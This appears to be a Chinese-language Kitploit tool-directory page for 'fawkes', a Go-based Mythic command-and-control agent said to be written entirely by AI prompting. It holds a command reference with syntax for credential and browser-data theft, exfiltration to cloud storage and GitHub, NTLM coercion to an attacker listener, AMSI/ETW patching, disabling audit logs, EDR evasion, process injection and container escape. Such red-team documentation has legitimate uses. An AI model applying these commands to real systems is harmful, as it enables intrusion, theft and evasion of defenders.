Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
fawkes — Fawkes 是一个由 AI 独家编写的 Golang Mythic C2 Agent。 | Kitploit
工具/GitHubGitHub/galoryber/fawkes
防御工具渗透测试框架权限提升漏洞利用框架横向移动后渗透利用云安全命令与控制Payload 开发容器逃逸
GitHubgaloryber/fawkes

fawkes

356272个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Fawkes 是一个由 AI 独家编写的 Golang Mythic C2 Agent。

查看仓库

Fawkes Mythic C2 Agent

Fawkes 是一个完全以氛围驱动的方式(vibe-coded)编写的 Mythic C2 代理。它始于一个“我想知道”的念头,如今已成为一个目标。我的目标是:不为此代理写一行代码,而是完全通过提示语(prompt)来生成它。

我最初尝试自己编写代理,但在克隆示例容器、阅读 Mythic 文档、观看开发系列 YouTube 视频,以及从 Merlin 或 Freyja 等其他代理复制代码后,我意识到自己根本没有时间开发自己的代理。不过,编写提示语这件事,我还是有时间做的。

Fawkes 是一个基于 Go 语言的代理,具备跨平台能力。它支持 Windows(EXE、DLL 和 shellcode 载荷)、Linux(ELF 二进制文件和共享库)以及 macOS(适用于 Intel 和 Apple Silicon 的 Mach-O 二进制文件)。总计 213 个命令:其中 113 个跨平台命令、82 个仅限 Windows 的命令、21 个仅限 Unix 的命令、11 个仅限 Linux 的命令,以及 6 个仅限 macOS 的命令(部分命令具有平台特定的实现,但共享同一个面向用户的名称,例如 screenshot)。支持 HTTP 出口和 TCP 点对点(P2P)链接,用于内部横向移动。

安装

要安装 Fawkes,你需要在一台远程计算机上安装 Mythic。你可以从 Mythic 项目页面 找到 Mythic 的安装说明。

从 Mythic 安装目录:``` ./mythic-cli install github https://github.com/galoryber/fawkes

## 命令快速参考Command | Syntax | Description
------- | ------ | -----------
acl-edit | `acl-edit -action read -server dc01 -target user` | 读取/修改Active Directory对象DACL(添加/删除ACE,授予DCSync、GenericAll,备份/恢复)。跨平台 (T1222.001, T1098, T1003.006)。
adcs | `adcs -action <cas\|templates\|find\|request\|auto-exploit> -server <DC> -username <user@domain> -password <pass> [-ca_name <CA>] [-template <name>] [-alt_name <UPN>]` | 枚举AD证书服务,发现易受攻击的模板(ESC1-ESC4,通过DCOM的ESC6),通过DCOM请求证书以利用ESC1/ESC6,或自动利用(查找→解析→请求链)。跨平台 (T1649)。
ads | `ads -action <write\|read\|list\|delete> -file <path> [-stream <name>] [-data <content>] [-hex true]` | **(仅Windows)** 管理NTFS备用数据流——写入、读取、列出或删除隐藏数据流。支持文本和十六进制编码的二进制。MITRE T1564.004。
amcache | `amcache -action <query\|search\|delete\|clear> [-name <pattern>] [-count <n>]` | 查询和清理取证执行痕迹。Windows: Shimcache。Linux: recently-used.xbel、缩略图、Tracker。macOS: 最近项目、KnowledgeC、隔离 (T1070.004)。
apc-injection | `apc-injection [-method <apc\|hwbp>] -pid <PID> [-tid <TID>] [-target_api ntdll!NtDelayExecution] [-timeout_ms 30000]` | **(仅Windows)** 远程进程注入。`-method apc`(默认)通过NtQueueApcThread将shellcode排队到可提醒线程(使用`ts`查找)。`-method hwbp`通过DebugActiveProcess附加,在目标API(默认为`ntdll!NtDelayExecution`)上设置DR0硬件断点,并在断点触发时将Rip重定向到shellcode——无需TID,无需APC队列,无需CreateRemoteThread (T1055.004, T1055)。
audio-capture | `audio-capture [-duration 10] [-sample_rate 16000] [-channels 1] [-device default]` | 从麦克风录制音频并上传WAV文件。Windows (waveIn)、Linux (arecord/parecord)、macOS (rec/ffmpeg)。跨平台 (T1123)。
auditpol | `auditpol -action <query\|disable\|enable\|stealth> [-category <name\|all>]` | **(仅Windows)** 查询和修改Windows审核策略。在敏感操作前禁用安全事件日志记录。隐身模式禁用检测关键子类别。使用AuditQuerySystemPolicy API (T1562.002)。
argue | `argue -command "cmd.exe /c whoami" -spoof "cmd.exe /c echo hello"` | **(仅Windows)** 使用伪造的进程参数执行命令。绕过Sysmon事件ID 1和EDR命令行遥测 (T1564.010)。
arp | `arp [-ip <subnet>]` 或 `arp -action spoof -target <IP> -gateway <IP>` | 显示带过滤的ARP表,或ARP缓存投毒用于中间人定位 (T1557.002)。欺骗:仅Linux,清理时恢复。
asrep-roast | `asrep-roast -server <DC> -username <user@domain> -password <pass> [-account <target>]` | 为未启用预认证的账户请求AS-REP票据,并以hashcat格式提取哈希用于离线破解。通过LDAP自动枚举。跨平台 (T1558.004)。
av-detect | `av-detect [-deep true]` | 通过扫描运行进程并与130+签名数据库比对,检测已安装的AV/EDR/安全产品。使用`--deep`时,还会检查内核模块、systemd单元和配置目录以发现已安装但未运行的产品(Linux)。报告产品、供应商、类型和PID。跨平台。
autopatch | `autopatch <dll_name> <function_name> <num_bytes>` | **(仅Windows)** 通过跳转到最近的返回(C3)指令来自动修补函数。用于AMSI/ETW绕过。
base64 | `base64 -action <encode\|decode\|xor\|hex\|hex-decode\|rot13\|url\|url-decode\|caesar> -input <data> [-key <key>] [-shift <N>] [-file true] [-output <path>]` | 数据编码工具包:base64、XOR(使用字符串/十六进制密钥)、十六进制、ROT13、URL百分比编码、凯撒密码。均支持文件I/O。跨平台 (T1132.001, T1140, T1027)。
bits | `bits -action <list\|create\|persist\|cancel\|suspend\|resume\|complete> [-name <job>] [-url <URL>] [-path <local>] [-command <exe>]` | **(仅Windows)** 管理BITS传输作业以实现持久化和隐蔽文件下载。创建、暂停、恢复、完成作业并设置通知命令以实现持久化。作业在重启后持续存在 (T1197)。
browser | `browser [-action <passwords\|cookies\|history\|autofill\|bookmarks\|downloads>] [-browser <all\|chrome\|edge\|chromium\|firefox>]` | 从Chromium、Firefox和Safari中提取浏览器数据。历史记录、自动填充、书签、下载跨平台。密码:Chromium (DPAPI/钥匙串/GNOME密钥环)、Firefox (key4.db NSS解密)、Safari (macOS钥匙串)。Firefox cookies在所有平台。MITRE T1555.003, T1217。
cat | `cat <file>` 或 `cat -path <file> -start N -end N -number true` | 显示文件内容,可指定行范围、行号,并有5MB大小保护。
cd | `cd <directory>` | 更改当前工作目录。
chmod | `chmod -path <file> -mode <permissions> [-recursive true]` | 使用八进制(755、644)或符号(+x、u+rw、go-w)表示法修改文件/目录权限。支持递归。跨平台 (T1222)。
chown | `chown -path <file> -owner <user> [-group <group>] [-recursive true]` | **(仅Linux/macOS)** 通过用户名/UID和组名/GID更改文件/目录所有者。支持递归 (T1222)。
cert-check | `cert-check -host <hostname> [-port 443] [-timeout 10]` | 检查远程主机上的TLS证书——识别CA、自签名证书、过期时间、SAN、TLS版本、密码套件和SHA256指纹。跨平台 (T1590.001)。
certstore | `certstore -action <list\|find> [-store <MY\|ROOT\|CA\|Trust\|TrustedPeople>] [-filter <substring>]` | **(仅Windows)** 枚举Windows证书存储以查找代码签名证书、客户端身份验证证书和私钥。搜索CurrentUser和LocalMachine。MITRE T1552.004, T1649。
clipboard | `clipboard -action <read\|write\|monitor\|dump\|stop> [-data "text"] [-interval 3]` | 读取/写入剪贴板或持续监控更改并检测凭据模式。跨平台 (T1115)。
cloud-metadata | `cloud-metadata -action <detect\|creds\|storage\|aws-iam\|azure-graph\|gcp-iam\|aws-s3\|azure-blob\|gcp-gcs\|aws-persist\|azure-persist\|aws-ssm\|azure-keyvault\|gcp-secrets\|...> [-provider <auto\|aws\|azure\|gcp\|do>]` | 云元数据、凭据提取、IAM枚举、存储枚举、持久化和机密存储访问。storage/aws-s3/azure-blob/gcp-gcs:枚举包含示例对象的存储桶/容器。aws-ssm:带解密的SSM参数存储。azure-keyvault:通过托管标识访问Key Vault机密。gcp-secrets:通过服务账号访问Secret Manager。aws-persist/azure-persist:创建长期访问密钥/应用注册。自动检测。IMDSv2。跨平台 (T1552.005, T1580, T1530, T1098.001)。
compress | `compress -action <create\|list\|extract\|stage\|exfil\|stage-exfil\|exfil-https\|exfil-github> -path <path> [-format zip\|tar.gz] [-output <out>] [-pattern *.txt] [-cleanup true]` | 创建、列出、提取、暂存或外泄归档。暂存使用AES-256-GCM加密。外泄传输到Mythic。exfil-https:通过分块上传、自定义头部、抖动上传到S3/Azure/GCS预签名URL。exfil-github:通过GitHub Contents API外泄。跨平台 (T1560.001, T1074.001, T1041, T1048, T1567, T1567.001)。
coerce | `coerce -server <target> -listener <attacker-ip> [-method petitpotam\|printerbug\|shadowcoerce\|all] -username <user> [-password <pass>] [-hash <NT hash>] [-domain <domain>]` | 通过MS-EFSR (PetitPotam)、MS-RPRN (PrinterBug)、MS-FSRVP (ShadowCoerce) 进行NTLM身份验证强制。强制目标对攻击者监听器进行身份验证。支持传递哈希。跨平台 (T1187)。
config | `config [-action show\|set\|update] [-key sleep\|jitter\|killdate\|working_hours_start\|working_hours_end\|working_days] [-value <val>] [-file <binary>] [-hash <sha256>]` | 查看或修改运行时代理配置,或自更新代理二进制文件。`show`/`set`:休眠、抖动、结束日期、工作时间。`update`:从Mythic下载新payload,验证,启动并退出当前代理。跨平台 (T1105)。
container-detect | `container-detect` | 检测容器运行时和环境(Docker、K8s、LXC、Podman、WSL)。检查逃逸向量如Docker套接字和K8s服务账号。跨平台 (T1082, T1497.001)。
container-escape | `container-escape -action <check\|docker-sock\|cgroup\|nsenter\|mount-host\|k8s-enum\|k8s-secrets\|k8s-rbac\|k8s-nodes\|k8s-etcd\|k8s-deploy\|k8s-exec> [-command '<cmd>'] [-path <ns>\|<ns1,ns2,...>\|*] [-kubeconfig /path/to/config]` | **(仅Linux)** 容器逃逸 + K8s操作——Docker套接字、cgroup、nsenter、主机设备挂载。K8s:枚举pod/服务、读取机密、**k8s-rbac**:ClusterRole/RoleBinding扫描 + 权限提升路径评分(严重/警告/信息)、**k8s-nodes**:集群节点攻击面(kubelet/OS/内核/CIDR/污点/角色)、**k8s-etcd**:从控制平面pod参数发现etcd客户端端点 + 每个端点的未认证`/version`探测(未认证读取 = 完全集群沦陷)、通过API部署/执行pod。**集群外**:`-kubeconfig`接受窃取的kubeconfig文件,用于非容器主机上的K8s访问(令牌+客户端证书认证)(T1611, T1610, T1613, T1552.007, T1069.003, T1087.004)。
cp | `cp <source> <destination>` | 将文件从源复制到目标。
cred-check | `cred-check [-action check\|verify-all] -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-timeout <seconds>]` | 在目标主机上测试凭据是否可用于SMB、WinRM和LDAP。`verify-all`并行测试所有存储凭据对发现的主机。跨平台 (T1110.001, T1078)。
下载工具